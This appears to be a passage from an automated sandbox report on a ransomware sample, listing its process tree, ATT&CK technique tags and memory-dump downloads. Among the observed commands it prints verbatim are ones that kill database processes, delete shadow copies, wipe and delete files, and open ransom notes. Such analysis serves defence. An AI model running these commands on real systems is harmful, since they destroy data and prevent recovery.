  - Suspicious use of AdjustPrivilegeToken
  PID:3240
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3688
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3068
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2060
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:3844
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:1824
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:188
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:1500
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:4072
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:3976
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\sample.exe
  2⤵
  PID:2032
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:1624

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1780

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1508
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\UnlockNew.shtml.[141-5D9-Y454]
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3668

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/620-116-0x000000001AD10000-0x000000001AD12000-memory.dmp

Filesize
8KB

Download
memory/620-114-0x0000000000100000-0x0000000000101000-memory.dmp

Filesize
4KB

Download
memory/2060-201-0x000001EBC2456000-0x000001EBC2458000-memory.dmp

Filesize
8KB

Download
memory/2060-189-0x000001EBC2F70000-0x000001EBC2F71000-memory.dmp

Filesize
4KB

Download
memory/2060-186-0x000001EBC2453000-0x000001EBC2455000-memory.dmp

Filesize
8KB

Download
memory/2060-184-0x000001EBC23E0000-0x000001EBC23E1000-memory.dmp

Filesize
4KB

Download
memory/2060-185-0x000001EBC2450000-0x000001EBC2452000-memory.dmp

Filesize
8KB

Download